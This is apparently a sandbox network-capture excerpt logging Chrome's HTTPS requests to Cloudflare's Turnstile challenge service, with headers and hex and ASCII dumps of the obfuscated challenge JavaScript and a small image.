75 2e 76 61 6c
                                        Data Ascii: ])}}function l(p){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,p[0]&&(n=0)),n;)try{if(o=1,c&&(u=p[0]&2?c.return:p[0]?c.throw||((u=c.return)&&u.call(c),0):c.next)&&!(u=u.call(c,p[1])).done)return u;switch(c=0,u&&(p=[p[0]&2,u.val
                                        2025-01-07 08:16:23 UTC1369INData Raw: 29 29 3b 76 61 72 20 50 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 2c 65 2e 4c 49 47 48 54 3d 22 6c 69 67 68 74 22 2c 65 2e 44 41 52 4b 3d 22 64 61 72 6b 22 7d 29 28 50 65 7c 7c 28 50 65 3d 7b 7d 29 29 3b 76 61 72 20 49 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 56 45 52 49 46 59 49 4e 47 3d 22 76 65 72 69 66 79 69 6e 67 22 2c 65 2e 56 45 52 49 46 59 49 4e 47 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 3d 22 76 65 72 69 66 79 69 6e 67 2d 68 61 76 69 6e 67 2d 74 72 6f 75 62 6c 65 73 22 2c 65 2e 56 45 52 49 46 59 49 4e 47 5f 4f 56 45 52 52 55 4e 3d 22 76 65 72 69 66 79 69 6e 67 2d 6f 76 65 72 72 75 6e 22 2c 65 2e 46 41 49 4c 55 52 45 5f 57 4f 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 3d 22 66 61 69
                                        Data Ascii: ));var Pe;(function(e){e.AUTO="auto",e.LIGHT="light",e.DARK="dark"})(Pe||(Pe={}));var Ie;(function(e){e.VERIFYING="verifying",e.VERIFYING_HAVING_TROUBLES="verifying-having-troubles",e.VERIFYING_OVERRUN="verifying-overrun",e.FAILURE_WO_HAVING_TROUBLES="fai
                                        2025-01-07 08:16:23 UTC1369INData Raw: 4f 4d 3d 22 63 75 73 74 6f 6d 22 7d 29 28 57 65 7c 7c 28 57 65 3d 7b 7d 29 29 3b 66 75 6e 63 74 69 6f 6e 20 4d 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 65 2e 69 6e 64 65 78 4f 66 28 72 29 21 3d 3d 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 69 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 75 74 6f 22 2c 22 64 61 72 6b 22 2c 22 6c 69 67 68 74 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 75 74 6f 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 63 74 28 65 29 7b 72 65 74 75 72 6e 20 65 3e 30 26 26 65 3c 39 65 35 7d 66 75 6e 63 74 69 6f 6e 20 75 74 28 65 29 7b 72 65 74 75 72 6e 20 65 3e 30 26 26 65 3c 33 36 65 34 7d 76 61 72 20 49 72 3d 2f 5e 5b 30 2d 39 41 2d 5a 61 2d 7a 5f 2d 5d 7b 33 2c
                                        Data Ascii: OM="custom"})(We||(We={}));function M(e,r){return e.indexOf(r)!==-1}function it(e){return M(["auto","dark","light"],e)}function ot(e){return M(["auto","never"],e)}function ct(e){return e>0&&e<9e5}function ut(e){return e>0&&e<36e4}var Ir=/^[0-9A-Za-z_-]{3,
                                        2025-01-07 08:16:23 UTC1369INData Raw: 2c 65 72 3d 22 2e 67 2d 72 65 63 61 70 74 63 68 61 22 2c 68 74 3d 22 63 66 5f 63 68 61 6c 6c 65 6e 67 65 5f 72 65 73 70 6f 6e 73 65 22 2c 5f 74 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 22 2c 62 74 3d 22 67 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 22 2c 74 72 3d 38 65 33 2c 45 74 3d 22 70 72 69 76 61 74 65 2d 74 6f 6b 65 6e 22 2c 72 72 3d 33 2c 6e 72 3d 35 30 30 2c 61 72 3d 35 30 30 2c 59 3d 22 22 3b 76 61 72 20 4e 72 3d 5b 22 62 67 2d 62 67 22 2c 22 64 61 2d 64 6b 22 2c 22 64 65 2d 64 65 22 2c 22 65 6c 2d 67 72 22 2c 22 6a 61 2d 6a 70 22 2c 22 6d 73 2d 6d 79 22 2c 22 72 75 2d 72 75 22 2c 22 73 6b 2d 73 6b 22 2c 22 73 6c 2d 73 69 22 2c 22 73 72 2d 62 61 22 2c 22 74 6c 2d 70 68 22 2c 22 75 6b 2d 75 61 22 5d 2c 6b
                                        Data Ascii: ,er=".g-recaptcha",ht="cf_challenge_response",_t="cf-turnstile-response",bt="g-recaptcha-response",tr=8e3,Et="private-token",rr=3,nr=500,ar=500,Y="";var Nr=["bg-bg","da-dk","de-de","el-gr","ja-jp","ms-my","ru-ru","sk-sk","sl-si","sr-ba","tl-ph","uk-ua"],k
                                        2025-01-07 08:16:23 UTC1369INData Raw: 62 6f 73 65 4c 61 6e 67 75 61 67 65 2c 6e 3d 65 2e 69 73 53 6d 61 6c 6c 65 72 46 65 65 64 62 61 63 6b 2c 6f 3d 65 2e 69 73 4d 6f 64 65 72 61 74 65 6c 79 56 65 72 62 6f 73 65 3b 72 65 74 75 72 6e 20 6e 26 26 72 3f 22 35 34 30 70 78 22 3a 6e 26 26 6f 3f 22 35 30 30 70 78 22 3a 6e 3f 22 34 38 30 70 78 22 3a 72 3f 22 36 35 30 70 78 22 3a 6f 3f 22 35 39 30 70 78 22 3a 22 35 37 30 70 78 22 7d 3b 66 75 6e 63 74 69 6f 6e 20 42 65 28 65 29 7b 69 66 28 65 3d 3d 3d 76 6f 69 64 20 30 29 74 68 72 6f 77 20 6e 65 77 20 52 65 66 65 72 65 6e 63 65 45 72 72 6f 72 28 22 74 68 69 73 20 68 61 73 6e 27 74 20 62 65 65 6e 20 69 6e 69 74 69 61 6c 69 73 65 64 20 2d 20 73 75 70 65 72 28 29 20 68 61 73 6e 27 74 20 62 65 65 6e 20 63 61 6c 6c 65 64 22 29 3b 72 65 74 75 72 6e 20 65 7d
                                        Data Ascii: boseLanguage,n=e.isSmallerFeedback,o=e.isModeratelyVerbose;return n&&r?"540px":n&&o?"500px":n?"480px":r?"650px":o?"590px":"570px"};function Be(e){if(e===void 0)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return e}
                                        2025-01-07 08:16:23 UTC1369INData Raw: 30 3b 72 65 74 75 72 6e 20 71 65 3d 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 69 66 28 6f 3d 3d 3d 6e 75 6c 6c 7c 7c 21 63 72 28 6f 29 29 72 65 74 75 72 6e 20 6f 3b 69 66 28 74 79 70 65 6f 66 20 6f 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 69 66 28 74 79 70 65 6f 66 20 72 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 29 7b 69 66 28 72 2e 68 61 73 28 6f 29 29 72 65 74 75 72 6e 20 72 2e 67 65 74 28 6f 29 3b 72 2e 73 65 74 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 72 65 74 75 72 6e 20 53 65 28 6f 2c 61 72 67 75 6d 65 6e 74 73 2c 63 65 28 74
                                        Data Ascii: 0;return qe=function(o){if(o===null||!cr(o))return o;if(typeof o!="function")throw new TypeError("Super expression must either be null or a function");if(typeof r!="undefined"){if(r.has(o))return r.get(o);r.set(o,c)}function c(){return Se(o,arguments,ce(t
                                        2025-01-07 08:16:23 UTC1369INData Raw: 75 6c 64 20 6e 6f 74 20 66 69 6e 64 20 54 75 72 6e 73 74 69 6c 65 20 73 63 72 69 70 74 20 74 61 67 2c 20 73 6f 6d 65 20 66 65 61 74 75 72 65 73 20 6d 61 79 20 6e 6f 74 20 62 65 20 61 76 61 69 6c 61 62 6c 65 22 2c 34 33 37 37 37 29 3b 76 61 72 20 72 3d 65 2e 73 72 63 2c 6e 3d 7b 6c 6f 61 64 65 64 41 73 79 6e 63 3a 21 31 2c 70 61 72 61 6d 73 3a 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 2c 73 72 63 3a 72 7d 3b 28 65 2e 61 73 79 6e 63 7c 7c 65 2e 64 65 66 65 72 29 26 26 28 6e 2e 6c 6f 61 64 65 64 41 73 79 6e 63 3d 21 30 29 3b 76 61 72 20 6f 3d 72 2e 73 70 6c 69 74 28 22 3f 22 29 3b 72 65 74 75 72 6e 20 6f 2e 6c 65 6e 67 74 68 3e 31 26 26 28 6e 2e 70 61 72 61 6d 73 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 28 6f 5b 31 5d 29 29
                                        Data Ascii: uld not find Turnstile script tag, some features may not be available",43777);var r=e.src,n={loadedAsync:!1,params:new URLSearchParams,src:r};(e.async||e.defer)&&(n.loadedAsync=!0);var o=r.split("?");return o.length>1&&(n.params=new URLSearchParams(o[1]))
                                        2025-01-07 08:16:23 UTC1369INData Raw: 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3d 22 23 66 66 66 66 66 66 22 2c 45 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 52 61 64 69 75 73 3d 22 35 70 78 22 2c 45 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 70 78 22 2c 45 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 70 78 22 2c 45 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 3d 22 68 69 64 64 65 6e 22 2c 45 2e 73 74 79 6c 65 2e 6d 61 72 67 69 6e 3d 22 30 70 78 20 61 75 74 6f 22 3b 76 61 72 20 53 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 66 72 61 6d 65 22 29 3b 53 2e 69 64 3d 22 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2d 66 72 22 29 2c 53 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 68 29 2c 53 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 6c 6c 6f 77 22
                                        Data Ascii: yle.backgroundColor="#ffffff",E.style.borderRadius="5px",E.style.left="0px",E.style.top="0px",E.style.overflow="hidden",E.style.margin="0px auto";var S=document.createElement("iframe");S.id="".concat(e,"-fr"),S.setAttribute("src",h),S.setAttribute("allow"


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        11192.168.2.449754104.18.95.414433696C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 08:16:23 UTC727OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8fe2815f5f9a43d9&lang=auto HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: */*
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: script
                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/wonk3/0x4AAAAAAA2J__x0qrFVzzde/auto/fbE/normal/auto/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-07 08:16:23 UTC331INHTTP/1.1 200 OK
                                        Date: Tue, 07 Jan 2025 08:16:23 GMT
                                        Content-Type: application/javascript; charset=UTF-8
                                        Content-Length: 117851
                                        Connection: close
                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                        Server: cloudflare
                                        CF-RAY: 8fe2816359c84204-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2025-01-07 08:16:23 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 71 71 51 4c 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70
                                        Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.qqQL2={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.privacy_link":"http
                                        2025-01-07 08:16:23 UTC1369INData Raw: 22 54 69 6d 65 64 25 32 30 6f 75 74 22 2c 22 69 6e 76 61 6c 69 64 5f 64 6f 6d 61 69 6e 22 3a 22 49 6e 76 61 6c 69 64 25 32 30 64 6f 6d 61 69 6e 2e 25 32 30 43 6f 6e 74 61 63 74 25 32 30 74 68 65 25 32 30 53 69 74 65 25 32 30 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 25 32 30 69 66 25 32 30 74 68 69 73 25 32 30 70 72 6f 62 6c 65 6d 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 5f 61 6c 77 61 79 73 5f 70 61 73 73 22 3a 22 54 65 73 74 69 6e 67 25 32 30 6f 6e 6c 79 25 32 43 25 32 30 61 6c 77 61 79 73 25 32 30 70 61 73 73 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 61 69 6c 75 72 65 22 3a 22 45 72 72 6f 72 22 2c 22 6e 6f 74 5f 65 6d 62 65 64 64 65 64 22 3a 22 54 68 69 73 25 32 30 63 68 61 6c 6c 65 6e 67 65 25 32 30 6d 75 73 74
                                        Data Ascii: "Timed%20out","invalid_domain":"Invalid%20domain.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","testing_only_always_pass":"Testing%20only%2C%20always%20pass.","turnstile_failure":"Error","not_embedded":"This%20challenge%20must
                                        2025-01-07 08:16:23 UTC1369INData Raw: 66 57 2c 66 58 2c 67 6e 2c 67 78 2c 67 42 2c 67 43 2c 67 47 2c 67 48 2c 66 55 2c 66 56 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 38 36 37 29 29 2f 31 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 34 38 34 29 29 2f 32 2b 70 61 72 73 65 49 6e 74 28 67 49 28 39 33 38 29 29 2f 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 36 33 38 29 29 2f 34 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 37 32 29 29 2f 35 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 35 32 29 29 2f 36 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 30 34 29 29 2f 37 2a 28 70 61 72 73 65 49 6e 74 28 67 49
                                        Data Ascii: fW,fX,gn,gx,gB,gC,gG,gH,fU,fV){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(867))/1+-parseInt(gI(1484))/2+parseInt(gI(938))/3*(-parseInt(gI(638))/4)+-parseInt(gI(1272))/5*(parseInt(gI(1252))/6)+parseInt(gI(1104))/7*(parseInt(gI
                                        2025-01-07 08:16:23 UTC1369INData Raw: 66 20 46 7d 2c 27 49 61 67 4d 56 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 29 7b 72 65 74 75 72 6e 20 46 3d 3d 3d 45 7d 2c 27 68 6b 49 51 50 27 3a 67 4d 28 39 32 39 29 2c 27 50 6a 69 67 49 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 29 7b 72 65 74 75 72 6e 20 45 7c 7c 46 7d 2c 27 45 4c 71 4d 46 27 3a 67 4d 28 31 31 32 36 29 2c 27 61 6d 52 71 7a 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 29 7b 72 65 74 75 72 6e 20 45 2b 46 7d 2c 27 53 67 6e 50 53 27 3a 67 4d 28 31 33 33 32 29 2c 27 6f 4c 73 76 76 27 3a 67 4d 28 31 31 31 33 29 2c 27 66 55 4b 7a 51 27 3a 67 4d 28 37 37 37 29 7d 29 3b 74 72 79 7b 69 66 28 6a 3d 69 5b 67 4d 28 37 31 39 29 5d 28 65 4f 2c 66 5b 67 4d 28 31 33 37 31 29 5d 2c 66 5b 67 4d 28 35 35 35 29 5d 29 2c 69 5b 67 4d 28 31 32 33 31 29 5d 28 66
                                        Data Ascii: f F},'IagMV':function(E,F){return F===E},'hkIQP':gM(929),'PjigI':function(E,F){return E||F},'ELqMF':gM(1126),'amRqz':function(E,F){return E+F},'SgnPS':gM(1332),'oLsvv':gM(1113),'fUKzQ':gM(777)});try{if(j=i[gM(719)](eO,f[gM(1371)],f[gM(555)]),i[gM(1231)](f
                                        2025-01-07 08:16:23 UTC1369INData Raw: 74 75 72 6e 20 6e 28 6f 2c 73 29 7d 2c 27 71 4f 66 4f 44 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 2c 73 29 7b 72 65 74 75 72 6e 20 6e 28 6f 2c 73 29 7d 7d 2c 65 5b 67 4e 28 36 35 38 29 5d 28 64 2c 45 72 72 6f 72 29 29 3f 65 5b 67 4e 28 33 35 31 29 5d 28 67 4e 28 31 33 35 35 29 2c 65 5b 67 4e 28 37 37 39 29 5d 29 3f 66 3d 28 65 28 29 2c 30 29 3a 28 66 3d 64 5b 67 4e 28 31 34 35 33 29 5d 2c 64 5b 67 4e 28 31 30 32 30 29 5d 26 26 65 5b 67 4e 28 35 36 34 29 5d 28 74 79 70 65 6f 66 20 64 5b 67 4e 28 31 30 32 30 29 5d 2c 67 4e 28 33 33 37 29 29 29 26 26 28 6a 3d 64 5b 67 4e 28 31 30 32 30 29 5d 5b 67 4e 28 36 39 32 29 5d 28 27 5c 6e 27 29 2c 65 5b 67 4e 28 32 32 33 29 5d 28 6a 5b 67 4e 28 31 30 30 38 29 5d 2c 31 29 29 26 26 28 6b 3d 2f 5e 5c 73 2a 61 74 5c 73
                                        Data Ascii: turn n(o,s)},'qOfOD':function(n,o,s){return n(o,s)}},e[gN(658)](d,Error))?e[gN(351)](gN(1355),e[gN(779)])?f=(e(),0):(f=d[gN(1453)],d[gN(1020)]&&e[gN(564)](typeof d[gN(1020)],gN(337)))&&(j=d[gN(1020)][gN(692)]('\n'),e[gN(223)](j[gN(1008)],1))&&(k=/^\s*at\s
                                        2025-01-07 08:16:23 UTC1369INData Raw: 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 66 28 67 29 7d 7d 2c 65 3d 63 5b 68 48 28 37 36 32 29 5d 2c 65 26 26 65 5b 68 48 28 31 31 35 35 29 5d 3d 3d 3d 64 5b 68 48 28 38 39 35 29 5d 26 26 64 5b 68 48 28 31 34 33 33 29 5d 28 65 5b 68 48 28 37 36 34 29 5d 2c 68 48 28 39 34 32 29 29 3f 66 72 3d 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 68 49 29 7b 68 49 3d 68 48 2c 64 5b 68 49 28 31 33 37 33 29 5d 28 66 52 29 7d 2c 31 65 33 29 3a 65 26 26 64 5b 68 48 28 39 32 33 29 5d 28 65 5b 68 48 28 31 31 35 35 29 5d 2c 68 48 28 34 37 38 29 29 26 26 65 5b 68 48 28 37 36 34 29 5d 3d 3d 3d 64 5b 68 48 28 38 36 36 29 5d 26 26 28 64 5b 68 48 28 36 35 30 29 5d 28 68 48 28 33 31 34 29 2c 68 48 28 35 36 35 29 29 3f 64 5b 68 48 28 38 38 36 29 5d 3d 68
                                        Data Ascii: ion(f,g){return f(g)}},e=c[hH(762)],e&&e[hH(1155)]===d[hH(895)]&&d[hH(1433)](e[hH(764)],hH(942))?fr=setInterval(function(hI){hI=hH,d[hI(1373)](fR)},1e3):e&&d[hH(923)](e[hH(1155)],hH(478))&&e[hH(764)]===d[hH(866)]&&(d[hH(650)](hH(314),hH(565))?d[hH(886)]=h
                                        2025-01-07 08:16:23 UTC1369INData Raw: 20 68 7c 69 7d 2c 27 51 55 73 69 46 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2b 69 7d 2c 27 59 4e 43 41 64 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 5e 68 7d 2c 27 6a 4d 5a 57 49 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 26 68 7d 2c 27 63 75 63 43 6b 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 56 4f 6e 78 4b 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 21 3d 3d 68 7d 2c 27 6a 63 71 62 77 27 3a 69 68 28 33 34 38 29 2c 27 61 74 4e 6d 7a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 54 63 48 44 64 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75
                                        Data Ascii: h|i},'QUsiF':function(h,i){return h+i},'YNCAd':function(h,i){return i^h},'jMZWI':function(h,i){return i&h},'cucCk':function(h,i){return h(i)},'VOnxK':function(h,i){return i!==h},'jcqbw':ih(348),'atNmz':function(h,i){return h<i},'TcHDd':function(h,i){retu
                                        2025-01-07 08:16:23 UTC1369INData Raw: 3d 53 74 72 69 6e 67 5b 69 68 28 31 36 31 36 29 5d 2c 66 3d 7b 27 68 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 69 29 7b 72 65 74 75 72 6e 20 69 69 3d 69 68 2c 64 5b 69 69 28 34 33 38 29 5d 28 6e 75 6c 6c 2c 68 29 3f 27 27 3a 66 2e 67 28 68 2c 36 2c 66 75 6e 63 74 69 6f 6e 28 69 2c 69 6a 2c 6a 2c 6b 2c 6d 29 7b 69 66 28 69 6a 3d 69 69 2c 6a 3d 7b 7d 2c 6a 5b 69 6a 28 36 31 31 29 5d 3d 64 5b 69 6a 28 31 31 32 30 29 5d 2c 6a 5b 69 6a 28 31 35 36 32 29 5d 3d 64 5b 69 6a 28 31 32 33 35 29 5d 2c 6b 3d 6a 2c 69 6a 28 33 38 32 29 21 3d 3d 69 6a 28 31 32 34 38 29 29 72 65 74 75 72 6e 20 69 6a 28 31 33 35 38 29 5b 69 6a 28 31 31 35 33 29 5d 28 69 29 3b 65 6c 73 65 7b 69 66 28 6a 28 6b 5b 69 6a 28 36 31 31 29 5d 29 29 72 65 74 75 72 6e 3b 69 66 28 21 5b 5d 3d 3d 3d
                                        Data Ascii: =String[ih(1616)],f={'h':function(h,ii){return ii=ih,d[ii(438)](null,h)?'':f.g(h,6,function(i,ij,j,k,m){if(ij=ii,j={},j[ij(611)]=d[ij(1120)],j[ij(1562)]=d[ij(1235)],k=j,ij(382)!==ij(1248))return ij(1358)[ij(1153)](i);else{if(j(k[ij(611)]))return;if(![]===
                                        2025-01-07 08:16:23 UTC1369INData Raw: 3d 42 5b 44 5d 2c 78 3d 30 3b 64 5b 69 6c 28 33 34 36 29 5d 28 78 2c 47 29 3b 49 3d 31 2e 38 32 26 4e 7c 49 3c 3c 31 2e 34 38 2c 4a 3d 3d 64 5b 69 6c 28 31 33 38 32 29 5d 28 6a 2c 31 29 3f 28 4a 3d 30 2c 48 5b 69 6c 28 38 34 34 29 5d 28 64 5b 69 6c 28 39 31 31 29 5d 28 6f 2c 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 44 3d 28 45 2d 2d 2c 30 3d 3d 45 26 26 28 45 3d 4d 61 74 68 5b 69 6c 28 34 36 32 29 5d 28 32 2c 47 29 2c 47 2b 2b 29 2c 42 5b 4d 5d 3d 46 2b 2b 2c 53 74 72 69 6e 67 28 4c 29 29 7d 69 66 28 64 5b 69 6c 28 33 31 38 29 5d 28 27 27 2c 44 29 29 7b 69 66 28 4f 62 6a 65 63 74 5b 69 6c 28 36 32 33 29 5d 5b 69 6c 28 38 32 37 29 5d 5b 69 6c 28 34 34 31 29 5d 28 43 2c 44 29 29 7b 69 66 28 64 5b 69 6c 28 35 32 31 29 5d 28 32
                                        Data Ascii: =B[D],x=0;d[il(346)](x,G);I=1.82&N|I<<1.48,J==d[il(1382)](j,1)?(J=0,H[il(844)](d[il(911)](o,I)),I=0):J++,N>>=1,x++);D=(E--,0==E&&(E=Math[il(462)](2,G),G++),B[M]=F++,String(L))}if(d[il(318)]('',D)){if(Object[il(623)][il(827)][il(441)](C,D)){if(d[il(521)](2
                                        2025-01-07 08:16:23 UTC1369INData Raw: 3a 66 6f 72 28 52 3d 30 3b 36 3e 52 3b 52 2b 2b 29 66 6f 72 28 55 3d 74 68 69 73 2e 68 5b 31 32 39 2e 36 31 5e 74 68 69 73 2e 67 5d 5b 33 5d 5e 64 5b 69 6c 28 31 32 36 36 29 5d 28 74 68 69 73 2e 68 5b 64 5b 69 6c 28 39 36 38 29 5d 28 31 32 39 2c 74 68 69 73 2e 67 29 5d 5b 31 5d 5b 69 6c 28 33 33 33 29 5d 28 74 68 69 73 2e 68 5b 64 5b 69 6c 28 32 38 37 29 5d 28 31 32 39 2c 74 68 69 73 2e 67 29 5d 5b 30 5d 2b 2b 29 2d 32 30 34 2c 32 35 36 29 26 32 35 35 2e 34 38 2c 56 3d 37 3b 30 3c 3d 56 3b 56 2d 2d 29 54 2b 3d 28 53 2f 3d 32 29 2a 64 5b 69 6c 28 39 38 34 29 5d 28 55 3e 3e 56 2c 31 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 39 27 3a 55 2a 3d 64 5b 69 6c 28 31 32 36 36 29 5d 28 31 2c 2d 32 2a 64 5b 69 6c 28 36 31 34 29 5d 28 45 2c 37 29 29 2a 54 3b 63
                                        Data Ascii: :for(R=0;6>R;R++)for(U=this.h[129.61^this.g][3]^d[il(1266)](this.h[d[il(968)](129,this.g)][1][il(333)](this.h[d[il(287)](129,this.g)][0]++)-204,256)&255.48,V=7;0<=V;V--)T+=(S/=2)*d[il(984)](U>>V,1);continue;case'9':U*=d[il(1266)](1,-2*d[il(614)](E,7))*T;c


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        12192.168.2.449755104.18.95.414433696C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 08:16:23 UTC739OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: image
                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/wonk3/0x4AAAAAAA2J__x0qrFVzzde/auto/fbE/normal/auto/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-07 08:16:23 UTC240INHTTP/1.1 200 OK
                                        Date: Tue, 07 Jan 2025 08:16:23 GMT
                                        Content-Type: image/png
                                        Content-Length: 61
                                        Connection: close
                                        cache-control: max-age=2629800, public
                                        Server: cloudflare
                                        CF-RAY: 8fe28163eb9142ea-EWR
                                        alt-svc: h3=":443"; ma=86400
